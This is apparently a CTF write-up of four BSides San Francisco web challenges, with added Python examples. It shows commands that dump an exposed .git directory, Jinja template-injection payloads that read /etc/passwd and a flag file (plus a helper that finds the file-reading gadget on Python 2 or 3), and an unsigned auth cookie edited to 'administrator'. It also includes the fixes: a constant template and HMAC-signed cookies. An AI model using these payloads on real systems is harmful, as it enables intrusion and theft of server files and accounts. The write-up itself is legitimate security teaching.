[BSides San Francisco CTF] Web 100 the-year-2000

Link: http://theyear2000.ctf.bsidessf.net/

As the page itself says, it was made with Apache, git, Notepad++ and HTML.

After an hour of searching I found the git vulnerability: the site serves its .git directory over HTTP, so the whole repository, history included, can be pulled down from the web root.

I used the gitdumper.sh and extractor.sh scripts (GitTools) to solve this challenge:

first, dump the repository objects and refs from the exposed .git:
gitdumper.sh http://theyear2000.ctf.bsidessf.net/.git/ repo

secondly, check every commit out into its own directory:
extractor.sh repo/ doom/

Opening the doom directory we see 3 folders, one per commit, each named index-commithash:
[screenshot: the three extracted commit directories]

Let's cat them one by one, oldest commit first:
cat doom/0-9e9ce4da43d0d2dc10ece64f75ec9cab1f4e5de0/index.html

I got lucky; the flag is right there in the first one:
FLAG:what_is_HEAD_may_never_die
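What extractor.sh is doing with the dumped repository, as an added example that is not part of this writeup or of GitTools: a minimal walker over loose git objects that starts at a commit, follows its tree and returns every blob by path. The repository it reads is constructed in code (a blob, a tree and a commit framed and hashed exactly as git stores them) so it runs offline; the object framing, sha1 naming and objects/xx/yyyy layout are git's own, while the file name, author and flag text are made up. It handles loose objects only; if a dump also contains packfiles, run git checkout inside the dumped directory instead.

```python
import hashlib
import zlib


def git_object(kind, payload):
    """Frame and hash a payload the way git stores a loose object:
    "<kind> <size>\\0<payload>", sha1 over the framed bytes, zlib on disk."""
    raw = b"%s %d\x00" % (kind.encode(), len(payload)) + payload
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def object_path(sha):
    """Where a dump (or a real repo) keeps the loose object for this sha."""
    return ".git/objects/%s/%s" % (sha[:2], sha[2:])


def parse_object(compressed):
    """Inverse of git_object: returns (kind, payload) and checks the size."""
    raw = zlib.decompress(compressed)
    header, _, payload = raw.partition(b"\x00")
    kind, size = header.split(b" ")
    if int(size) != len(payload):
        raise ValueError("corrupt object")
    return kind.decode(), payload


def parse_tree(payload):
    """Tree entries are "<mode> <name>\\0<20 raw sha bytes>", back to back."""
    entries, i = [], 0
    while i < len(payload):
        nul = payload.index(b"\x00", i)
        mode, name = payload[i:nul].split(b" ", 1)
        sha = payload[nul + 1:nul + 21].hex()
        entries.append((mode.decode(), name.decode(), sha))
        i = nul + 21
    return entries


def extract_commit(objects, commit_sha):
    """Check one commit out into a dict {path: bytes}, like extractor.sh does
    into <n>-<sha>/. `objects` maps sha -> compressed bytes; a real dump would
    read them from object_path(sha)."""
    kind, payload = parse_object(objects[commit_sha])
    if kind != "commit":
        raise ValueError("not a commit: " + commit_sha)
    first_line = payload.split(b"\n", 1)[0]            # b"tree <sha>"
    tree_sha = first_line.split(b" ")[1].decode()
    files = {}

    def walk(sha, prefix):
        for mode, name, entry_sha in parse_tree(parse_object(objects[sha])[1]):
            entry_kind, entry_payload = parse_object(objects[entry_sha])
            if entry_kind == "tree":
                walk(entry_sha, prefix + name + "/")
            else:
                files[prefix + name] = entry_payload

    walk(tree_sha, "")
    return files


def build_sample_repo():
    """Constructed three-object repository: one blob in one tree in one commit."""
    objects = {}
    blob_sha, blob = git_object("blob", b"<html>FLAG:constructed_flag</html>\n")
    objects[blob_sha] = blob
    tree_sha, tree = git_object(
        "tree", b"100644 index.html\x00" + bytes.fromhex(blob_sha))
    objects[tree_sha] = tree
    commit_sha, commit = git_object(
        "commit",
        b"tree " + tree_sha.encode() + b"\n"
        b"author ctf <ctf@example.com> 0 +0000\n"
        b"committer ctf <ctf@example.com> 0 +0000\n\n"
        b"constructed commit\n")
    objects[commit_sha] = commit
    return objects, commit_sha


if __name__ == "__main__":
    objects, head = build_sample_repo()
    for path, data in extract_commit(objects, head).items():
        print(object_path(head), path, data.decode().strip())
```

The same walk, repeated for every commit reachable from the dumped refs, is how a file deleted from the live site (as here, where the flag only survives in an earlier commit) comes back out of the history.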

[BSides San Francisco CTF] Web 100 zumbo2

Viewing the page source I can see a reference to server.py, so I open it:
http://zumbo-8ac445b1.ctf.bsidessf.net/server.py

In it I found with open('/flag'), which means the flag is a file on the server and you have to find a way to reach that file.

I also found a Jinja template injection: the handler opens whatever page name you request as a file and, when that fails, renders the exception message (which contains your page name) with render_template_string. Just try:
http://zumbo-8ac445b1.ctf.bsidessf.net/index.template{{7*7}} and you will see the expression evaluated to 49 in the error text.

Open Burp Suite and test:

First:
GET /index.template{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} HTTP/1.1 -> it shows the contents of the passwd file

Here ''.__class__.__mro__[2] is object on the target's Python 2 (str -> basestring -> object) and __subclasses__()[40] happened to be the file class there; the index depends on the interpreter build and what it has imported, so if it does not work for you, render __subclasses__() first and pick the right entry.

Second try:

GET /index.template{{''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}} HTTP/1.1

-> TADA -> FLAG: RUNNER_ON_SECOND_BASE
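The injection above, and the reason the hard-coded [40] is fragile, as an added example that is not the challenge's code and not Jinja2: a stand-in renderer that evaluates each {{ expr }} once with no builtins (enough to stand in for Jinja's attribute walking so this runs without Jinja2 installed), the zumbo handler modelled on it next to a hardened version that keeps the template constant, and the writeup's payload rebuilt with the file-reading gadget located by name at run time. The gadget names are assumptions about the interpreter: the builtin file class on Python 2, and os._wrap_close on Python 3, which only exists once os has been imported (this module imports it). The secret it reads back is a constructed temp file.

```python
import os
import re
import sys
import tempfile

# {{ expr }} matcher for the stand-in renderer below.
EXPR = re.compile(r"\{\{(.*?)\}\}")


def render(template, context):
    """Substitute every {{ expr }} in `template` once. Context values are
    inserted as data and never re-parsed, as in a real template engine.
    eval with empty builtins stands in for Jinja's expression evaluation."""
    return EXPR.sub(
        lambda m: str(eval(m.group(1), {"__builtins__": {}}, dict(context))),
        template)


def vulnerable_render(page):
    """Model of the zumbo handler: open() fails and its message, which
    contains the caller-supplied page name, becomes the template source."""
    try:
        template = open(page).read()
    except Exception as e:
        template = str(e)
    return render(template, {"name": "test"})


ERROR_TEMPLATE = "Could not open page: {{ page }}"   # fixed template text


def fixed_render(page):
    """Hardened form: the template is a constant and the page name goes in as
    a context value, so {{7*7}} inside it is printed, not evaluated."""
    try:
        return open(page).read()
    except Exception:
        return render(ERROR_TEMPLATE, {"page": page})


def subclass_index(name):
    """Position of the first direct subclass of object with this name. The
    number depends on the interpreter and on what it has imported, which is
    why the [40] in the writeup only worked on the target."""
    for i, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == name:
            return i
    raise LookupError(name)


def file_read_payload(path):
    """The writeup's payload with the gadget found by name. Python 2: the
    builtin file class. Python 3 (assumption: os is imported, as it is here):
    os._wrap_close, whose __init__ globals reach sys and through it the
    builtins module's open()."""
    subclasses = "''.__class__.__mro__[-1].__subclasses__()"
    if sys.version_info[0] == 2:
        return "%s[%d](%r).read()" % (subclasses, subclass_index("file"), path)
    return ("%s[%d].__init__.__globals__['sys'].modules['builtins'].open(%r).read()"
            % (subclasses, subclass_index("_wrap_close"), path))


def demo_read_file(contents):
    """Write a constructed secret to a temp file, read it back through the
    injection, and return the rendered response."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as f:
        f.write(contents)
    try:
        return vulnerable_render("index.template{{" + file_read_payload(path) + "}}")
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(vulnerable_render("index.template{{7*7}}"))
    print(fixed_render("index.template{{7*7}}"))
    print(demo_read_file("FLAG: constructed_flag\n"))
```

Keeping the template constant closes the injection; the open(page) on a caller-supplied name is a separate problem (the real server only avoids path traversal because Flask's default route converter stops at '/') and needs its own allow-list of page names.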

[BSides San Francisco CTF] Web 20p zumbo1

Link: http://zumbo-8ac445b1.ctf.bsidessf.net/index.template
Viewing the source we see the server.py file, which contains:

# Python 2 (print statement). Two things were lost when the page was
# extracted and are restored here so the file runs: the '<page>' in the
# first route, and the two %s placeholders on the template line (the original
# wording of that string is not recoverable; the comment form is an assumption).
import flask, sys, os
import requests

app = flask.Flask(__name__)
counter = 12345672

@app.route('/<page>')
def custom_page(page):
    if page == 'favicon.ico': return ''
    global counter
    counter += 1
    try:
        # the request path is used directly as a file name
        template = open(page).read()
    except Exception as e:
        # the error text contains the requested name, so that name
        # becomes part of the template source
        template = str(e)
    template += "\n\n<!-- %s %s -->" % (page, __file__)
    # attacker-influenced string rendered as a template: template injection
    return flask.render_template_string(template, name='test', counter=counter);

@app.route('/')
def home():
    return flask.redirect('/index.template');

if __name__ == '__main__':
    flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD'   # sits in the source itself
    with open('/flag') as f:                 # a file on the server's disk
        flag2 = f.read()
    flag3 = requests.get('http://vault:8080/flag').text   # fetched from an internal host

    print "Ready set go!"

    sys.stdout.flush()

    app.run(host="0.0.0.0")

and flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD' -> yup, this is what I need. Note that none of the three flag variables is ever returned by a route, so flag2 and flag3 have to be reached another way (flag2 through the template injection in zumbo2 above).

[BSides San Francisco CTF] web easyauth 30p

Link: http://easyauth-afee0e67.ctf.bsidessf.net

and the file easyauth.php.
The hint says to try logging in with guest/guest, and after doing so I found a cookie which looks like:

auth=username=guest&date=...........
Opening the easyauth.php file we see the line "It's cool that you logged in, but unfortunately we can only give the flag to 'administrator'. :("

It's easy, right? The cookie is plain key=value data with nothing tying it to the server, so just change guest to administrator and resend it
--------> FLAG:0076ecde2daae415d7e5ccc7db909e7e
ezpz lemon squeezy
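The forgery above and what would have stopped it, as an added example that is not easyauth.php's code: the cookie fields are parsed and rewritten the way the writeup does by hand, beside a signed variant that appends an HMAC-SHA256 over the fields under a key the client never sees, so the same edit is rejected. The cookie layout is the one observed in the challenge; the date value, the key and the field ordering are constructed for this example.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

SAMPLE_COOKIE = "username=guest&date=2017-02-12"   # constructed date value
SERVER_KEY = b"constructed-server-secret"           # assumption: lives only on the server


def parse_auth(cookie):
    """Split the auth value into a dict, e.g. {'username': 'guest', 'date': ...}."""
    return dict(parse_qsl(cookie, keep_blank_values=True))


def forge(cookie, username):
    """What the writeup does by hand: rewrite username, keep everything else."""
    fields = parse_auth(cookie)
    fields["username"] = username
    return urlencode(fields)


def is_admin_unsigned(cookie):
    """The vulnerable check: believes whatever the client sent."""
    return parse_auth(cookie).get("username") == "administrator"


def sign(fields, key=SERVER_KEY):
    """Hardened cookie: the same fields plus an HMAC over their canonical
    (sorted) encoding, so neither value edits nor reordering survive."""
    body = urlencode(sorted(fields.items()))
    mac = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + "&sig=" + mac


def verify(cookie, key=SERVER_KEY):
    """Return the fields only if the signature checks out, else None.
    hmac.compare_digest keeps the comparison constant-time."""
    fields = parse_auth(cookie)
    sig = fields.pop("sig", None)
    if sig is None:
        return None
    body = urlencode(sorted(fields.items()))
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    return fields


def is_admin_signed(cookie, key=SERVER_KEY):
    """The check easyauth should have done: trust the fields only after verify()."""
    fields = verify(cookie, key)
    return fields is not None and fields.get("username") == "administrator"


if __name__ == "__main__":
    forged = forge(SAMPLE_COOKIE, "administrator")
    print(forged, is_admin_unsigned(forged))
    signed = sign({"username": "guest", "date": "2017-02-12"})
    print(signed, is_admin_signed(signed), is_admin_signed(forge(signed, "administrator")))
```

A signature only helps while the key stays server-side; the date field still needs a freshness check, because a signed administrator cookie is otherwise valid forever once obtained.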